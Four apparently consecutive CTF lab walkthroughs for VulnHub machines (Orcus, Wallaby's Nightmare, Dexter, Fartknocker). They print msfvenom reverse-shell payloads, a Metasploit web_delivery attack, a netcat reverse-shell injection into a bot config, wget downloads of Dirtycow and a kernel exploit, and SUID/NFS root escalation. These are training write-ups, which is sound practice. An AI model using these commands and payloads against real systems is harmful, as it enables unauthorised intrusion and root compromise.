Hack the Orcus VM CTF Challenge

Hello friends! Today again we are here with a new vulnerable hub challenge “ORCUS” design by Mr. Viper. Through this article we are sharing our work efforts which we have utilize to complete the challenge so that we can catch the flag and beat the goal of this VM machine. This machine contains 4 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box 4. There is something on this box.

You can download it from here.

 Let’s Breach!!

192.168.0.151 is the trget ip now as we know that enumeration must be the first step for gathering information of any victim so therefore I had used version scan through namp.

nmap -p- -sV 192.168.0.151

From screenshot you can see there are so many open ports but I will go with port 80.

Since port 80 was opened therefore I had explore target IP 192.168.0.151 in the browser but here I didn’t get any remarkable thing.

Without wasting time I choose another tool dirb for directories brute force attack. To start brute force attack for directories open the terminal and type following:

dirb http://192.168.0.151

Awesome! We have stepped up in right direction and dug out many directories but when you will see the given screenshot there I had highlighted the “backups” directories. So now I will go with backups directory.

In browser I explored 192.168.0.151/backups as URL, where I found a tar file “simple PHP Quiz-backup.tar.gz”. Without taking more time I just download it for further enumeration.

So after unzip when I open it I found php and html files inside it, keeping eyes on php files I choose db-conn.php for fetching more details in hop to get something related to database.

Finally after making many efforts I found database username and password as dbuser: dbpasswords respectively.

In dirb brute force attack we have found many directories once again if you will scroll up you will notice phpmyadmin directory in the above given screenshot. Now again I will move towards browser to explore 192.168.0.1.51/phpmyadmin in URL. Form given below screenshot you can observe I had entered above username and password here.

When you will give correct login credential it will allow you to login inside phpmyadmin page. From screenshot you can see I have successfully login inside it using above credential, here I found a database “zenphoto” and decided to move inside it for further details.

Now inside zenphoto I found a setup page which will update the configuration file for the database inside web server when we will fill the information in the given text field.

Here only we need to provide database username i.e. dbuser and database password i.e. dbpassword

Without disturbing other fields click on save which will start database zenphoto installation.

This will start installation when you will click on go tab given at the end of the page. The zenphoto setup will start installing theme and plug-in for your database after that you have to set your admin user and password.

Further click on given tab I agree to these terms and condition.

Now type name for new user as admin  and typepassword: password and confirm password as shown in below image and then click on apply tab given at the top 

Then login into zenphoto database using credential as admin: password. So now we are inside admin console where we have decided to upload an image but here we upload any zip file only.

Now use msfvenom to generate malicious PHP script and type following command.

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 –f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text highlighted text further we will paste it inside text document and saved with shell.php after that create a new folder copy shell.php inside it and compress it.

 Most important thing is to start multi handler inside metasploit.

Then come back to the Browser to upload your zip file, now browse your file and click on upload. Then explore following url 192.168.0.151/zenphoto/albums, from given image you can see our shell.php is successfully uploaded now click on it.

When you will click on shell.php you will get meterpreter session inside metasploit. Now type following command in order to catch the flag.

Meterpreter >cd /var/www

Meterpreter >ls

Meterpreter >cat flag.txt

 Congrats! We have caught 1st flag.

After so many efforts I found a folder kippo then I step towards it for more information.

Meterpreter >pwd

Meterpreter >cd ..

Meterpreter >cat etc/kippo/data/userdb.txt

 Finally! Caught 2nd flag also.

Now for root privilege escalation open a text document and following: reference

https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#suid-binary

 

Then save it as raj.c on the desktop.

Now upload raj.c file for compiling and gain root access as shown in following image.

Meterpreter >upload/root/Desktop/raj.c

Meterpreter >shell

gcc -o raj raj.c

Since we know from the nmap’s result nfs port was open in targeted IP so taking advantage of it we will mount tmp ‘s data in url Kali Linux. Now create a folder mount data inside it.

mount -t nfs 192.168.0.151:/tmp mount

Chown root: root raj

Chmod u+s raj

./raj

Id

Cd /root

Cat flag.txt

Grate!! We have Caught 3rd flag also.

Now try yourself to find out one more flag.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Nightmare VM (CTF Challenge)

Today we are going to solve Wallaby’s Nightmare CTF which is a new VM challenge of vulnhub where attacker has to achieve root flag of the targeted VM machine; you can download it from here.

LET’S BEGIN!

As we always start from network so that we can have target IP. In your kali Linux open the terminal and type netdiscover, now from screenshot you can see list of IP. Here 192.168.0.101 is my target IP.

Enumerate the target through aggressive scan; type following command for nmap scanning:

nmap -p- A 192.168.0.101

So here I found three ports 22, 80, 6667 are open.

Since port 80 is open I look toward browser and explore target ip 192.168.0.101 where I found a comment “enter a username to get started with this CTF” then I type the name “RAJ” and click on submit so that we could move forward into start the game.

When I clicked on submit tab it linked to next web page where you can read the assign username for this CTF from screenshot now we can start this CTF when we will click on given link start the CTF!

Next web page open with exclusive warning that Mr. Wallaby found raj is trying to penetrate inside the server so user “raj” is under his observation. Then soon after reading this threat   I observe at its URL I thought it might be vulnerable to etc/passwd same as LFI attack.

Then I try browse following in URL 192.168.1.101/?page=/etc/passwd though the web page stand up with raw data but nothing was quite useful in this web page. And when I refresh it I lose connection from port 80. As raj was threaten by Wallaby 😉 

Again I move toward nmap so that I can make sure about port 80 but here I found a new port 60080 is open for http service as you can perceive this thing from given screenshot.

Then I next my next tool dirb

Dirb http://192.168.0.101:60080/?page=

Now from screenshot you can see the result and currently we will look toward highlighted directory.

So when I browse 192.168.0.101:60080/?page=mailer in URL the resultant web page gets opened and I found nothing especial here except “coming soon guys!

Then I look after page source code to get some clue, here inside HTML code the anchor tag contains a link for another file which you can see from screenshot.

Again I browse above highlighted text 192.168.0.101:60080/?mailer&mail=pwd in URL and the web page comes outside with /var/www/html

Hence we can say that the current page might good for executing malicious comment as command.  

Now load metasploit framework to connect with victim through reverse connection

Msfconsole

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)>set lhost 192.168.0.106 (IP of Local Host)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>exploit

Now copy the generated command php….UvrG’));” and send it to target

From screenshot you can see I have paste above malicious PHP comment inside url in hope to get reverse connection inside metasploit.

So when I execute this comment I receive meterpreter session and get connected with victim shell

Meterpreter> sysinfo

Meterpreter>shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
cd /tmp

Now use “Dirtycow exploit” therefore type following command to download this exploit inside tmp folder of victim.

Wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c

Now type following command to compile your exploit so that it can run successfully inside.

gcc cowroot.c –o cowroot -pthread

Now we can run our exploit to achieve root permission and try to capture the flag

./cowroot

id

cd /root

ls

Cat flag.txt

Congratulation!!! We have captured the flag which you can see from screenshot and beat this task………..

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Bot challenge: Dexter (Boot2Root Challenge)

Hi friends! Today we are going to face Bot challenge in new VM machine of vulnhub design by Mr. Brian Wallace. In this tutorial you will how to access root privilege by generating malicious bot. you can download this challenge from here.

Let’s start!!!

Open the terminal of Klai Linux to Identify the target in your network using netdiscover command.

Netdiscover

From screenshot you can see the highlighted target IP : 192.168.1.105

Enumerate open port of targeted IP using nmap therefore type following command:

nmap -p- -Pn 192.168.1.105

From its scanning result we come to know that port 22, 80, 111, 55844 are open ports.

Seeing as port 80 is open I come across towards browser and look at target IP 192.168.1.105. Here the web page was pointing out towards two more different links “Panel” and “Dexter Analysis for a different botnet”.

When I visit to second link it was redirected to another web site and I found this link is not for our use but when I click on “panel” this linked me to a login page.

So now I was at login page and I have no idea for its username: password here I also try sql login form injection but couldn’t breach this login page.

Now next I choose dirbuster for directory brute force attack to step forward in expectation to get some directories inside it.

From screenshot you can perceive the files and directories which I found through brute force attack. Next we need to explore these directories in browser so that we can find our any clue to breach login page.

I start with upload.php where we can upload our malicious file or backdoor as you can see from screenshot I try to upload hacked.php file but nothing happened. Then I try to explore another directory but unable to find any clue regarding this task.

When I investigate more, then after wasting much I found apart from all directories only gateway.php was suffering from blind SQL injection vulnerable but here the post parameter was encoded with base 64.

Now attacker has two options either configure sqlmap to retrieve credential or download relevant exploit Dexter Casino Loader SQL Injection given by Brian Wallace. I had use this exploit to find out login credential. You can download it from here.

Once you have downloaded it then type following command in terminal:

Python 31686.py dump http://192.168.1.106/Panel/gateway.php

Now you will get login credential for bot panel.

Then I typed above fetched username and password into login form.

The panel has three basic features; bot control, dump viewer, and file upload.  Without wasting time I click on upload options.

Now again I will try to upload php backdoor so that we get reverse connection of target system.

Now use msfvenom to generate malicious PHP script and type following command.

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 –f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text highlighted text further we will past it inside text document and saved with shell.php and multi handler inside metasploit.

Now go back to upload directory and upload shell.php now you can see from given image the shell.php file is successfully upload inside /panel/exes.

Here we are going to execute shell.php which gives reverse connection in metasploit framework.

192.168.1.105/panel/exes

Awesome! We have victim’s metrepreter session

Metrepreter > ls

Metrepreter > cd var/www

Metrepreter > ls

Inside /var/www I found my bot file antitamper.list, now first we will download it

Metrepreter >download antitamper.list   /root/Desktop

Here you can read the downloaded file then add you malicious bot inside it

Now I have add my malicious bot  then upload it again inside /var/www and  start netcat for reverse connection then run antitamper.py

“shell”: “‘; /bin/nc -e /bin/sh 192.168.1.104 4444 #”,

Nc –nlvp 4444

id

Hurray!!! We have got root connection.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Fartknocker VM (CTF Challenge)

Top HatSec built a VM image “Fart knocker” and kept the challenge to capture the flag in his machine. This VM box is mainly design for testing your network penetration skills, before solving this challenge you must know about network packet analysis and port knocking.

 Let’s begin!

 Scan your network using netdiscover command I found an IP address 192.168.1.25 in my network.

Enumerate the target through aggressive scan; type following command for nmap scanning:

nmap -p- A 192.168.1.25

So here I found only single port 80 is open

Since port 80 is open I look toward browser and explore target ip 192.168.1.25, here I got a Link “Woah” without wasting time I just clicked on it.

Link Woah contains a pcap1.pcap file; I download it to find out some clue.

This file open with wireshark here I distinguish that VM box trying to connect over TCP ports 7000, 8000, and 9000. Behind the machine efforts on those 3 ports it gets discarded and some obstructed attempts on a connection RST, ACK; when I dig out more I found this technique is known as port knocking.

Port 7000 is used for connection but rejected.

Port 8000 is used for connection but rejected.

Port 9000 is used for connection but rejected.

Now send packets to 7000, 8000, 9000 so that these ports sequence will open another port. Therefore type following command for nmap to perform a Sequential Port Scan.

Nmap –r –p 7000, 8000, 9000 192.168.1.25

Once again scan target machine using aggressive scan.

Nmap –p- A 192.168.1.25

Great!  Here we can see 8888 is open now and from screenshot you read a new directory /burgerworld/

Then I run towards browser to explore 192.168.1.25/burgerworld/ this time again I found another link heheh..hehh that contains one more pcap file again I download that pcap2.pcap file.

Now the game is very clear Top HatSec had involve port knowing at each step, again I opened pcap2 file with wireshark but this time I didn’t found any port knocking sequence therefore I randomly select a packet to follow it TCP stream.  Here you can select any packet make right click on it and choose follow option.

TCP stream captured the following image point towards another clue through CAN YOU UNDERSTAND MY MESSAGE!

Hush! His message was in German language!  

When I translate it I got one three three seven. This port 1337 could be another knocking port.

Again type following command for nmap to perform a Sequential Port Scan.

Nmap –r –p 1337 192.168.1.25

Oooh!!! It is showing waste service means perform a Sequential Port Scan fail to knock 1337.

Use another way “netcat” to knock port 1337:

Nc –nv 192.168.1.25 1337

But connection refused now try single port number.

 Nc –nv 192.168.1.25 1

Nc –nv 192.168.1.25 3

Nc –nv 192.168.1.25 3

Nc –nv 192.168.1.25 7

Finally port 1337 get opened which points towards /iamcornholio/

Explore 192.168.1.25/iamcornholio/

This time I found a base 64 encode string which should to be decoded so that we can move forward.

I took the help of burp suite to decode this string “T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK” and what I found was quite interesting.

Open up SSH: 8888 9999 7777 6666

Again Use “netcat” to knock following port:

Nc –nv 192.168.1.25 8888

Nc –nv 192.168.1.25 9999

Nc –nv 192.168.1.25 7777

Nc –nv 192.168.1.25 6666

From screenshot you can I have use version scan for target.

Nmap –SV 192.168.1.25

Awesome port 22 is opened for SSH

Now try to connect with target through ssh –l butthead 192.168.1.25 /bin/bash

Here I got successfully login now type following command

ls

uname –a

I Found kernel version 3.13.0 now let’s find out whether there is any exploit related to its present or not.

With the help of Google I found an exploit from screenshot you can see the link for “ofs 32” click on it to download this exploit that allow a local user to take administration privilege.

Now type following command to download ofs 32 inside victim’s system and then achieve root privileges to capture the flag.

Wget https://www.kernel-exploit.com/media/ofs_32

Ls

./ofs_32

Id

Cd /root

Ls

Cat secretz

SECRET = “LIVE LONG AND PROSPER, REST IN PEACE MR. SPOCK”

!!This was very curies and most challenging machine!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...